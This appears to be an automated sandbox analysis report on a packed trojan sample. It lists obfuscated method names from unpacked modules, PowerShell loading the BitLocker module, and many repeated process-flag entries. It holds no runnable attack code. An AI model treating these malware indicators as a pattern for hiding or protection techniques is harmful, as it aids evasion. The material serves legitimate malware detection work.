Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, sn8T3eqEZoYykx8cPF.cs	High entropy of concatenated method names: 'utUYpwo06', 'xuPKm0IR9', 'fkQZehJOk', 'rYE258lRL', 'TwhfyQhKL', 'st3w1IXsU', 'XvrYba1AOireYOLo7n', 'UBubUAlvZ1lFUAdlFF', 'P95TtkgE7', 'EkRO0Scvd'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, H85CDsAEXTxa2kUmrN.cs	High entropy of concatenated method names: 'PjYxQ9VqwN', 'KfWxcmB3hk', 'boHxoZEQme', 'MaTxPdJCBl', 'sP4xXPxE1E', 'A4xxBarKWO', 'IZxxUG1T1w', 'yoPT8F9L0t', 'VrcTNLJPsh', 'MaITmpqXld'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, WnD0OZ69l1ff1c0ugFq.cs	High entropy of concatenated method names: 'XiCxgPse39', 'nMpx4k1gjN', 'fI3xYBUp2D', 'BdGxKCM0Nv', 'uoQxrxGKNf', 'yDXxZrg0ZH', 'm5sx2qJbQP', 'M3VxIwkDFd', 'uYmxfIPbO9', 'ttZxwdWm0K'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, aivdY56SnFUlwKJRc43.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tPdOGB5oR4', 'd2SOicxY6E', 'TkTOkNruY6', 'yQ6O7pmOhy', 'dLVOAvfsE5', 'ALmOsSEU0b', 'o9DO80MQ4m'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.2501ae8.1.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.2501ae8.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24f56d0.0.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24f56d0.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24a6fe8.2.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24a6fe8.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.4f50000.6.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.4f50000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
